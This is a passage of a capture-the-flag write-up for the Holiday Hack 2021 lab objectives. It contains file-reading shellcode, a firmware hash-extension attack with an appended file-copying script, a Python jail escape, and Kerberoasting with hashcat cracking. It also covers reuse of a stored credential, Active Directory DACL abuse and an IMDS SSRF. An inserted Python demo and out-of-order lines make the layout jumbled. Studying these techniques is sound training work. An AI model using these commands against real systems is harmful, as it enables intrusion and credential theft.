1. The file descriptor for stdout is always 1
2. The best value for count is the return value from sys_read, but you can experiment with that as well (if it's too long,
you might get some garbage after; that's okay!)
Finally, if you use rsp as a buffer, you won't be able to ret: you're going to overwrite the return address and ret will
crash. That's okay! You remember how to sys_exit, right? :) (For an extra challenge, you can also subtract from rsp,
use it, then add to rsp to protect the return address. That's how applications typically do
it.) Good luck!
; TODO: Get a reference to this string into the correct register
call after_string
db '/etc/passwd',0
after_string:
; Set up a call to sys_open
; TODO: Set rax to the correct syscall number
mov rax,2
; TODO: Set rdi to the first argument (the filename)
pop rdi
; TODO: Set rsi to the second argument (flags - 0 is fine)
mov rsi,0
; TODO: Set rdx to the third argument (mode - 0 is also fine)
mov rdx,0
; Perform the syscall
syscall
; syscall sets rax to the file handle, so to return the file handle we don't
; need to do anything else!
ret
If you complete the final level successfully, you are given the answer that needs to be entered into the badge for this
objective. The output from northpolesecrets.txt is shown below:
Entering the answer of cyber security knowledge, into the badge completes the objective and earns you the Shellcode
Primer! achievement.
2.7 Objective 7 – Printer Exploitation
Objective 6 is meant to be a walk through of using Splunk to do an investigation on the logs and traffic generated by
the Atomic Red Team tests.
; Get a reference to the filename string into rdi (the call pushes its address onto the stack)
call after_string
db '/var/northpolesecrets.txt',0
after_string:
; sys_open(filename, flags=0, mode=0); rax = 2 is sys_open on x86-64
mov rax,2
pop rdi
mov rsi,0
mov rdx,0
syscall
; sys_read(fd, buf, count): the fd is the handle sys_open left in rax
mov rdi,rax
mov rax,0
; Reserve 200 bytes of stack below the return address and use that as the buffer
sub rsp,200
mov rsi,rsp
mov rdx,200
syscall
; sys_write(1, buf, count): write the buffer to stdout; rsi still points at the buffer
; after the stack is restored, and a count of 200 is "a bit too high" but acceptable here
mov rax,1
mov rdi,1
mov rsi,rsp
add rsp,200
mov rdx,200
syscall
; rsp was restored above, so the return address is intact and ret is safe (no sys_exit needed)
mov rax,0
ret
The following hints are given for this challenge by Ruby Cyster after completing the previous objective:
• Printer Firmware – When analyzing a device, it’s always a good idea to pick apart the firmware.
Sometimes these things come down to Base64-encoding.
• Hash Extension Attacks – Hash Extension Attacks can be super handy when there’s some type of validation
to be circumvented.
• Dropping Files – Files placed in /app/lib/public/incoming will be accessible under
https://printer.kringlecastle.com/incoming.
• Untitled Hint – Do you know that if you append multiple files of that type, the last one is processed?
So we will probably need to complete a hash extension attack on the firmware and append a file that gives us a remote
shell or copies the file of interest into a directory we can access. We also find, upon accessing the printer
interface, that we can download the existing firmware as a JSON file, as seen below:
We find some important information here that we should record, as it could be useful later. First we have a base64-
encoded blob that we can decode; more on that later. We also have information on the validation method used
for this file:
• Signature hash: 2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97
• Secret Length: 16
• Algorithm: SHA256
We also find, upon decoding the base64, that we have a zip file containing a firmware.bin binary.
It looks like we have everything we need for a hash extension attack given the hints. Let's add an exploit shell
script and zip it, then complete the hash extension attack with the hash_extender tool on GitHub. We can clone
the repo with git clone https://github.com/iagox86/hash_extender, then build it by changing into the directory and
running make (on Linux, of course). We create a new zip file containing a custom firmware.bin, a script that copies
/var/spool/printer.log to /app/lib/public/incoming/xploit.log, alongside the original firmware renamed to xploit.bin.
Now we run the following commands:
{
"firmware": "UesDBBQAAAAIAEWlkFMWoKjwagkAAOBAAAAMABwAZmlybXdh...",
"signature": "2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97",
"secret_length": 16,
"algorithm": "SHA256"
}
[linuxace@objective7]$ cat firmware-export.json | jq '.firmware' | tr -d '"' | base64 -d > firmware.zip
[linuxace@objective7]$ file firmware.zip
firmware.zip: Zip archive data, at least v2.0 to extract
[linuxace@objective7]$ unzip firmware.zip
Archive: firmware.zip
inflating: firmware.bin
[linuxace@objective7]$ mv firmware.bin xploit.bin
[linuxace@objective7]$ printf '#!/bin/sh\ncp /var/spool/printer.log /app/lib/public/incoming/xploit.log\n' > firmware.bin
[linuxace@objective7]$ zip xploit.zip firmware.bin xploit.bin
We can take the hex output (the New string) of this command and use CyberChef to convert the hex to base64, then use
the base64-encoded zip containing our payload and the new signature to modify the firmware-export.json file, and upload it.
We should then have a valid signature, and the last file processed should be run, copying the printer spool file to a location
we can access via the web interface.
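To see why a signature computed as SHA256(secret || firmware) with a 16-byte secret is forgeable, and what fixes it, here is an added Python example (not code from this report or from hash_extender) that reimplements the length extension against a constructed demo secret and then checks the forged blob against both the printer-style verifier and an HMAC-SHA256 verifier. DEMO_SECRET and the firmware bytes are constructed stand-ins; the real secret is never needed by the extension, only its length.

```python
import hashlib
import hmac
import struct

# Constructed 16-byte secret for the demo. Only the real secret's length (16, from
# firmware-export.json) matters to the attacker, which is exactly what length extension exploits.
DEMO_SECRET = b"demo-secret-0016"

SHA256_IV = [0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a,
             0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19]
K = [
    0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
    0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
    0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
    0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
    0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
    0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
    0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
    0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2,
]


def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & 0xFFFFFFFF


def _compress(state, block):
    """One SHA-256 compression of a 64-byte block into the 8-word state."""
    w = list(struct.unpack(">16L", block))
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & 0xFFFFFFFF)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + (_rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25)) + ((e & f) ^ (~e & g)) + K[i] + w[i]) & 0xFFFFFFFF
        t2 = ((_rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22)) + ((a & b) ^ (a & c) ^ (b & c))) & 0xFFFFFFFF
        a, b, c, d, e, f, g, h = (t1 + t2) & 0xFFFFFFFF, a, b, c, (d + t1) & 0xFFFFFFFF, e, f, g
    return [(x + y) & 0xFFFFFFFF for x, y in zip(state, [a, b, c, d, e, f, g, h])]


def sha256_padding(msg_len):
    """The Merkle-Damgard padding SHA-256 appends to a msg_len-byte message."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", msg_len * 8)


def sha256_resume(state_hex, absorbed_len, extra):
    """Continue hashing from a known digest as if absorbed_len bytes (a multiple of 64) were
    already processed, then absorb extra; returns the hex digest of the whole extended message."""
    state = list(struct.unpack(">8L", bytes.fromhex(state_hex)))
    data = extra + sha256_padding(absorbed_len + len(extra))
    for off in range(0, len(data), 64):
        state = _compress(state, data[off:off + 64])
    return struct.pack(">8L", *state).hex()


def sha256_hex(data):
    """Plain SHA-256 on the same primitive, used to self-check against hashlib."""
    return sha256_resume(struct.pack(">8L", *SHA256_IV).hex(), 0, data)


def weak_sign(secret, data):
    """The printer's scheme: SHA256(secret || firmware)."""
    return hashlib.sha256(secret + data).hexdigest()


def weak_verify(secret, data, sig):
    return hmac.compare_digest(weak_sign(secret, data), sig)


def hmac_verify(secret, data, sig):
    """The fix: HMAC-SHA256 hashes the secret in again after the data, so the digest is not a resumable state."""
    return hmac.compare_digest(hmac.new(secret, data, hashlib.sha256).hexdigest(), sig)


def length_extend(orig_data, orig_sig, secret_len, append):
    """Without the secret, produce (data, sig) that weak_verify accepts. The glue is the padding the
    original hash already absorbed, so the published digest is the state from which 'append' continues."""
    glue = sha256_padding(secret_len + len(orig_data))
    forged = orig_data + glue + append
    return forged, sha256_resume(orig_sig, secret_len + len(orig_data) + len(glue), append)


def selfcheck():
    return all(sha256_hex(m) == hashlib.sha256(m).hexdigest()
               for m in (b"", b"abc", b"x" * 55, b"y" * 64, b"z" * 200))


def demo():
    """Returns (weak verifier accepts forgery, HMAC verifier accepts forgery) for the constructed firmware."""
    firmware = b"PK\x03\x04" + b"constructed stand-in for the original firmware.zip"
    sig = weak_sign(DEMO_SECRET, firmware)
    forged, fsig = length_extend(firmware, sig, len(DEMO_SECRET), b"PK\x03\x04appended archive entry")
    return weak_verify(DEMO_SECRET, forged, fsig), hmac_verify(DEMO_SECRET, forged, fsig)


if __name__ == "__main__":
    print("sha256 self-check:", selfcheck())
    print("(weak accepts, HMAC accepts):", demo())
```

The forged blob is the original data, the padding bytes, then the appended data, which is why the printer sees a second zip appended and processes the last one; the HMAC verifier rejects the same blob.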
After uploading the file with the correct signature we get the following result.
Now we can obtain the file we need by using curl:
We see that the last .xlsx file printed is Troll_Pay_Chart.xlsx. We can enter this into the objective on our badge to
solve the objective and earn the Hash extension of ELF or firmware achievement.
2.8 Objective 8 – Kerberoasting on an Open Fire
This is one of two challenges in this year’s event that is listed as five trees. We must use a number of techniques,
including Kerberoasting, to obtain a document that has a secret ingredient Santa urges each elf and reindeer to
consider. We have to find this ingredient and enter it on the badge for this challenge. We can receive hints for
this objective by talking to Eve Snowshoes and solving the HoHo...No terminal.
[linuxace@objective7]$ ./hash_extender --file=firmware.zip --append=`xxd -p xploit.zip | tr -d '\n'` --append-format=hex --signature=2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97 --format=sha256 --secret=16 --out-data-format=hex
Type: sha256
Secret length: 16
New signature: e88de8d46972f4208717086e99d27c9aaed64f39f3726ba2ca5f149a0c152b61
New string: 504b030414000000080045a5905316a0a8f06a090000e04000000c001c006669726d776...
{
"firmware": "UesDBBQAAAAIAEWlkFMWoKjwagkAAOBAAAAMABwAZmlybXdh...",
"signature": "dce5658ae7a012cada67080dd9098e6f246a3f4821179fc63169bd49b226ee38",
"secret_length": 16,
"algorithm": "SHA256"
}
[linuxace@objective7]$ curl https://printer.kringlecastle.com/incoming/xploit.log
Documents queued for printing
=============================
Biggering.pdf
Size Chart from https://clothing.north.pole/shop/items/TheBigMansCoat.pdf
LowEarthOrbitFreqUsage.txt
Best Winter Songs Ever List.doc
Win People and Influence Friends.pdf
Q4 Game Floor Earnings.xlsx
Fwd: Fwd: [EXTERNAL] Re: Fwd: [EXTERNAL] LOLLLL!!!.eml
Troll_Pay_Chart.xlsx
The following hints are given by Eve Snowshoes for this objective:
• Kerberoast and AD Abuse Talk – Check out Chris Davis’ talk and scripts on Kerberoasting and Active
Directory permissions abuse.
• Kerberoasting and Hashcat Syntax – Learn about Kerberoasting to leverage domain credentials to get
usernames and crackable hashes for service accounts.
• Finding Domain Controllers – There will be some 10.X.X.X networks in your routing tables that may be
interesting. Also, consider adding -PS22,445 to your nmap scans to “fix” default probing for unprivileged
scans.
• Hashcat Mangling Rules – OneRuleToRuleThemAll.rule is great for mangling when a password dictionary
isn't enough.
• CeWL for Wordlist Creation – CeWL can generate some great wordlists from websites, but it will ignore
digits in terms by default.
• Stored Credentials – Administrators often store credentials in scripts. These can be co-opted by an attacker
for other purposes!
• Active Directory Interrogation – Investigating Active Directory errors is harder without Bloodhound, but
there are native methods.
The first thing we must do is to sign up for an Elf University account at https://register.elfu.org/register. This will
create an unprivileged domain user with which we can log in using SSH. A real email address must be used to receive our
credentials for authentication.
We then find ourselves in an application jail. After some trial and error, we are able to break out of the Python
application and obtain a shell by pressing CTRL+D (which raises an EOFError at the input() prompt and drops us into
the interpreter) and then using the os library to run bash, as seen below.
Let's begin exploring with the tools on the system, including nmap. Running route, we see the following networks:
We can do some scans to find the domain controller and any file shares, as we will need these for the next step.
===================================================
= Elf University Student Grades Portal =
= (Reverts Everyday 12am EST) =
===================================================
1. Print Current Courses/Grades.
e. Exit
: Traceback (most recent call last):
File "/opt/grading_system", line 41, in <module>
main()
File "/opt/grading_system", line 26, in main
a = input(": ").lower().strip()
EOFError
>>> import os
>>> os.system("/bin/bash")
foszlyqkmw@grades:~$
foszlyqkmw@grades:~$ route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 172.17.0.1 0.0.0.0 UG 0 0 0 eth0
10.128.1.0 172.17.0.1 255.255.255.0 UG 0 0 0 eth0
10.128.2.0 172.17.0.1 255.255.255.0 UG 0 0 0 eth0
10.128.3.0 172.17.0.1 255.255.255.0 UG 0 0 0 eth0
172.17.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
# Nmap 7.80 scan initiated Wed Jan 5 14:19:30 2022 as: nmap -Pn --open --script=smb-enum-shares -p 445 -T 5 -oN report.txt --open 172.17.0.0/16
172.17.0.3
Shares:
IPC$
ElfUFiles
172.17.0.4
Shares:
IPC$
elfu_svc_shr
netlogon
sysvol
research_dep
10.128.3.30
Shares:
IPC$
elfu_svc_shr
netlogon
sysvol
research_dep
# Nmap 7.80 scan initiated Wed Jan 5 02:05:53 2022 as: nmap -Pn -p 389 -T 5 -oN report.txt --open 172.17.0.0/16 10.128.1.0/24 10.128.2.0/24
Hosts of interest
172.17.0.4
10.128.3.30
10.128.1.53
Next, we can attempt to get Kerberos tickets for accounts with SPNs set. After copying the GetUserSPNs.py script to
the system, we run it against the most likely domain controllers, 10.128.1.53 and 10.128.3.30.
We now have a TGS-REP hash for the elfu_svc service account that we can try to crack offline. Let's use cewl to gather
all the words on register.elfu.org/register with the following command.
Now let's try to crack the service account's password using hashcat with the OneRuleToRuleThemAll rules.
iagsdckwxy@grades:~$ python3 GetUserSPNs.py -outputfile spns.txt -dc-ip 10.128.1.53
elfu.local/iagsdckwxy:'Djxfimuhm@' -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
Delegation
----------------------------------- -------- -------- --------------------------
-------------------------- ----------
ldap/elfu_svc/elfu elfu_svc 2021-10-29 19:25:04.305279 2022-01-05
14:42:40.370050
ldap/elfu_svc/elfu.local elfu_svc 2021-10-29 19:25:04.305279 2022-01-05
14:42:40.370050
ldap/elfu_svc.elfu.local/elfu elfu_svc 2021-10-29 19:25:04.305279 2022-01-05
14:42:40.370050
ldap/elfu_svc.elfu.local/elfu.local elfu_svc 2021-10-29 19:25:04.305279 2022-01-05
14:42:40.370050
iagsdckwxy@grades:~$ cat spns.txt
$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$f4f52dcd49f6e127fb8166cbb55a8c1b$71b9...
iagsdckwxy@grades:~$
linuxace@kalioscp:~$ cewl --with-numbers -d 2 https://register.elfu.org/register -w elfu.txt
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja/)
linuxace@kalioscp:~$ cat elfu.txt
the
domain
and
Elf
University
Student
Registration
ElfU
linuxace@kalioscp:~$ hashcat -m 13100 --rules OneRuleToRuleThemAll.rule --force elfu.hash elfu.txt
hashcat (v6.1.1) starting…
…
$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$f4f52dcd49f6e127fb8166cbb55a8c1b$71...:Snow2021!
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_sv...fd3ade
Time.Started.....: Wed Jan 5 10:09:30 2022, (18 secs)
Time.Estimated...: Wed Jan 5 10:09:48 2022, (0 secs)
Guess.Base.......: File (elfu.txt)
Guess.Mod........: Rules (OneRuleToRuleThemAll.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 169.5 kH/s (3.36ms) @ Accel:4 Loops:8 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests
Progress.........: 3134208/4003615 (78.28%)
Rejected.........: 0/3134208 (0.00%)
Restore.Point....: 0/77 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:40696-40704 Iteration:0-8
Candidates.#1....: He -> cimes
We now have a password for the elfu_svc account. Let's see if we can access some previously inaccessible network
shares with it. The elfu_svc_shr share is a good candidate, given its name.
Examining these files, we find a large collection of PowerShell scripts, so we can grep through them for
stored passwords. After searching the files for the word password and doing some Googling on the different
characteristics of the PowerShell files, we find the following in GetProcessInfo.ps1:
It appears that this script has everything we need to access the domain controller as the remote_elf user:
At this point we need to find a way to add ourselves to the correct group to get access to the research_dep share.
After investigating many of the groups and permissions using ADSI and other built-in tools, we find that the remote_elf
user has WriteDacl permission on the Research Department group.
iagsdckwxy@grades:~$ smbclient //10.128.3.30/elfu_svc_shr -U elfu_svc
Enter WORKGROUP\elfu_svc's password:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Thu Dec 2 16:39:42 2021
.. D 0 Wed Jan 5 08:01:27 2022
Get-NavArtifactUrl.ps1 N 2018 Wed Oct 27 19:12:43 2021
Get-WorkingDirectory.ps1 N 188 Wed Oct 27 19:12:43 2021
Stop-EtwTraceCapture.ps1 N 924 Wed Oct 27 19:12:43 2021
…
smb: > prompt
smb: > mget *
getting file Get-NavArtifactUrl.ps1 of size 2018 as Get-NavArtifactUrl.ps1 (1970.5 KiloBytes/sec)
(average 1970.7 KiloBytes/sec)
getting file Get-WorkingDirectory.ps1 of size 188 as Get-WorkingDirectory.ps1 (183.6 KiloBytes/sec)
(average 1077.1 KiloBytes/sec)
iagsdckwxy@grades:~/ps$ cat GetProcessInfo.ps1
$SecStringPassword =
"76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwA
NgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQAN
ABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANw
BlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Invoke-Command -ComputerName 10.128.1.53 -ScriptBlock { Get-Process } -Credential $aCred -Authentication Negotiate
PS /home/iagsdckwxy/ps> $SecStringPassword =
>> "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwA
NgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQAN
ABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANw
BlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
PS /home/iagsdckwxy/ps> $aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
PS /home/iagsdckwxy/ps> $aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
PS /home/iagsdckwxy/ps> Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred
[10.128.1.53]: PS C:\Users\remote_elf\Documents>
Now we can run the following scripts, adapted from those provided in the hints, to grant ourselves access to the
Research Department group and thereby to the research_dep share from the command line.
After a few minutes we are able to access the research_dep share using our original unprivileged username.
We can base64-encode this PDF file and copy it to our own system for viewing:
$ADSI = [ADSI]"LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
$ADSI.psbase.ObjectSecurity.GetAccessRules($true,$true,[Security.Principal.NTAccount])
...
ActiveDirectoryRights : WriteDacl
InheritanceType : None
ObjectType : 00000000-0000-0000-0000-000000000000
InheritedObjectType : 00000000-0000-0000-0000-000000000000
ObjectFlags : None
AccessControlType : Allow
IdentityReference : ELFU\remote_elf
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
...
[10.128.1.53]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $username = "iagsdckwxy"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $password = "Djxfimuhm@"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $b=New-Object byte[] $sid.BinaryLength
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $sid.GetBinaryForm($b,0)
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $hexSID=[BitConverter]::ToString($b).Replace('-','')
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.Add("LDAP://<SID=$hexSID>")
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()
iagsdckwxy@grades:~/ps$ smbclient //10.128.3.30/research_dep -U iagsdckwxy
Enter WORKGROUP\iagsdckwxy's password:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Thu Dec 2 16:39:42 2021
.. D 0 Wed Jan 5 08:01:27 2022
SantaSecretToAWonderfulHolidaySeason.pdf N 173932 Thu Dec 2 16:38:26 2021
41089256 blocks of size 1024. 34346872 blocks available
smb: > get SantaSecretToAWonderfulHolidaySeason.pdf
getting file SantaSecretToAWonderfulHolidaySeason.pdf of size 173932 as
SantaSecretToAWonderfulHolidaySeason.pdf (56616.6 KiloBytes/sec) (average 56618.5 KiloBytes/sec)
smb: >
[10.128.1.53]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $username = "iagsdckwxy"
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $propGUID = [guid]'00000000-0000-0000-0000-000000000000'
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $secOptions = $domainDirEntry.get_Options()
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.RefreshCache()
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[10.128.1.53]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()
Now we can read the PDF and answer the question for the objective on the badge with the answer, kindness.
After entering the answer, kindness into the badge, we complete the objective and earn the Kerberoasting on an Open
Fire achievement.
2.9 Objective 9 – Splunk!
Objective 9 is located in the Great Room.
The following hints are given by Fizzy Shortstack after solving the Yara Analysis terminal.
• GitHub Monitoring in Splunk – Between GitHub audit log and webhook event recording, you can monitor
all activity in a repository, including common git commands such as git add, git status, and git commit.
• Sysmon Monitoring in Splunk – Sysmon network events don’t reveal the process parent ID for example.
Fortunately, we can pivot with a query to investigate process creation events once you get a process ID.
• Malicious NetCat?? - Did you know there are multiple versions of the Netcat command that can be used
maliciously? nc.openbsd, for example.
Below are the questions, the SPL to answer the question and the answer.
1. Capture the commands Eddie ran most often, starting with git. Looking only at his process launches as reported by
Sysmon, record the most common git-related CommandLine that Eddie seems to use.
Answer: git status
2. Looking through the git commands Eddie ran, determine the remote repository that he configured as the origin for
the ‘partnerapi’ repo. The correct one!
Answer: git@github.com:elfnp3/partnerapi.git
iagsdckwxy@grades:~$ cat SantaSecretToAWonderfulHolidaySeason.pdf | base64 | tr -d '\n'
JVBERi0xLjMKJcTl8uXrp/Og0MTGCjMgMCBvYmoKPDwgL0ZpbHRlciAvRmxhdGVEZWNvZGUgL0xlbmd0aCA0OTc5ID4+CnN0c...
...
linuxace@kalioscp:~$ echo Og0MTGCjMgMCBvYmoKPDwgL0ZpbHRlciAvRmxhdGVEZWNvZGUgL0xlbmd0aCA0OTc5ID4+CnN0c... | base64 -d > Santa.pdf
index=main git | stats count by CommandLine | sort - count
index=main git partnerapi origin | where isnotnull(CommandLine) | table CommandLine
3. Eddie was running Docker on his workstation. Gather the full command line that Eddie used to bring up the
partnerapi project on his workstation.
Answer: docker compose up
4. Eddie has been testing automated static application security testing (SAST) in GitHub. Vulnerability reports have
been coming into Splunk in JSON format via GitHub webhooks. Search all the events in the main index in Splunk
and use the sourcetype field to locate these reports. Determine the URL of the vulnerable GitHub repository that the
elves cloned for testing and document it here. You will need to search outside of Splunk (try GitHub) for the original
name of the repository.
https://www.google.com/search?q=dvws-node+github&oq=dvws-node+github
Answer: https://github.com/snoopysecurity/dvws-node
5. Santa asked Eddie to add a JavaScript library from NPM to the ‘partnerapi’ project. Determine the name of the
library and record it here for our workshop documentation.
Answer: holiday-utils-js
6. Another elf started gathering a baseline of the network activity that Eddie generated. Start with their search and
capture the full process_name field of anything that looks suspicious.
Answer: /usr/bin/nc.openbsd
7. Uh oh. This documentation exercise just turned into an investigation. Starting with the process identified in the
previous task, look for additional suspicious commands launched by the same parent process. One thing to know
about these Sysmon events is that Network connection events don’t indicate the parent process ID, but Process
creation events do! Determine the number of files that were accessed by a related process and record it here:
Answer: 6
8. Use Splunk and Sysmon Process creation data to identify the name of the Bash script that accessed sensitive files
and (likely) transmitted them to a remote IP address.
Answer: preinstall.sh
index=main docker CommandLine=* NOT iptables NOT untar NOT proxy NOT entrypoint NOT libnetwork NOT runc
NOT ps NOT init NOT ipv6 NOT resolver NOT git| table CommandLine | stats count by CommandLine
index=main sourcetype=ghe_audit_log_monitoring | stats count by repo
index=main partnerapi npm | table CommandLine
index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=3
user=eddie NOT dest_ip IN (127.0.0.*) NOT dest_port IN (22,53,80,443)
| stats count by Image
index=main /usr/bin/nc.openbsd | table ParentProcessId
(ParentProcessId = 6788)
then
index=main ParentProcessId=6788 | rex field=CommandLine "cat\s(?<directory>/.*\s)" | eval directories=split(directory, " ") | stats count(directories) by CommandLine
(count = 6)
index=main sourcetype=journald source=Journald:Microsoft-Windows-Sysmon/Operational EventCode=3
user=eddie NOT dest_ip IN (127.0.0.*) NOT dest_port IN (22,53,80,443)
| stats count by Image
After completing task 8, we receive a pop-up that gives us the answer we need to enter on our badge to solve the
objective.
After entering the word whiz into the Objective 9 text box we complete the objective and earn the Splunk!
achievement.
2.10 Objective 10 – Now Hiring!
For this challenge you need to find an SSRF vulnerability that you can use to find an AWS secret access key.
The following hints are given to help solve this objective by Noxious O Dior after solving the IMDS terminal:
• AWS IMDS Documentation – The AWS documentation for IMDS is interesting reading.
Browsing the website, we find that the Career Application has a field for a URL to your public NLBI report. This
looks like an ideal place for an SSRF. After using the browser's developer tools to see what is submitted, we check this
with curl and find that we get a strange image after submitting a valid IMDS URL for the NLBI report.
Note that the image name is the inputName concatenated with .jpg, and that this link provides us the result of our
IMDS query. We can use this to try to find an IAM role that has security credentials.
